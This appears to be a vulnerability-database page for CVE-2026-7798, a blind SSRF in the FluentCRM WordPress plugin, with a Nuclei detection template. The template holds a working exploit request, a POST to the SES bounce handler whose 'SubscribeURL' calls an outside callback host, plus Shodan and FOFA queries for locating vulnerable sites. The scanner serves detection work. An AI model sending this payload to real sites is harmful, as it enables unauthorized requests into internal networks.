| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2026-7798 | 22 May 202607:50 | – | attackerkb | |
| CVE-2026-7798 | 22 May 202613:02 | – | circl | |
| WordPress plugin FluentCRM 代码问题漏洞 | 22 May 202600:00 | – | cnnvd | |
| CVE-2026-7798 | 22 May 202607:50 | – | cve | |
| CVE-2026-7798 FluentCRM <= 2.9.87 - Unauthenticated Blind Server-Side Request Forgery via 'SubscribeURL' Parameter | 22 May 202607:50 | – | cvelist | |
| EUVD-2026-31418 | 22 May 202607:50 | – | euvd | |
| CVE-2026-7798 | 22 May 202609:16 | – | nvd | |
| WordPress FluentCRM – Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution plugin <= 2.9.87 - Unauthenticated Blind Server-Side Request Forgery vulnerability | 21 May 202619:20 | – | patchstack | |
| PT-2026-42735 | 22 May 202600:00 | – | ptsecurity | |
| CVE-2026-7798 | 5 Jun 202619:39 | – | redhatcve |
id: CVE-2026-7798
info:
name: WordPress FluentCRM <= 2.9.87 - Unauthenticated Blind SSRF
author: 0x_Akoko
severity: medium
description: |
FluentCRM WordPress plugin <= 2.9.87 contains a blind server-side request forgery caused by improper validation of the 'SubscribeURL' parameter, letting unauthenticated attackers make arbitrary web requests, exploit requires unconfigured SES bounce handling key.
impact: |
Unauthenticated attackers can make arbitrary internal web requests, potentially querying or modifying internal service information.
remediation: |
Update to a version later than 2.9.87 or the latest available version.
reference:
- https://plugins.trac.wordpress.org/browser/fluent-crm/trunk/app/Hooks/Handlers/ExternalPages.php
- https://nvd.nist.gov/vuln/detail/CVE-2026-7798
- https://wordpress.org/plugins/fluent-crm/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2026-7798
epss-score: 0.00645
epss-percentile: 0.46435
cwe-id: CWE-918
metadata:
verified: false
max-request: 2
publicwww-query: "wp-content/plugins/fluent-crm"
fofa-query: body="fluent-crm"
shodan-query: http.html:"fluent-crm"
tags: cve,cve2026,wordpress,wp-plugin,fluentcrm,ssrf,wp
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/fluent-crm/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "FluentCRM")'
- 'compare_versions(version, "<= 2.9.87")'
condition: and
internal: true
extractors:
- type: regex
name: version
part: body
regex:
- '(?i)Stable tag:\s*([\w.]+)'
group: 1
internal: true
- raw:
- |
POST /?fluentcrm=1&route=bounce_handler&provider=ses HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"Type":"SubscriptionConfirmation","SubscribeURL":"http://{{interactsh-url}}"}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "http")'
- 'status_code == 200'
- 'contains(body, "success")'
condition: and
# digest: 4a0a00473045022100c558488a80d22e01a1ad9f48f45f36b5337147afbbd14b6480040f73ce0160eb02200de9342949a9e0d9a564b2970c80d3fee152e86714421d19dda9640dfbfd1b61:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation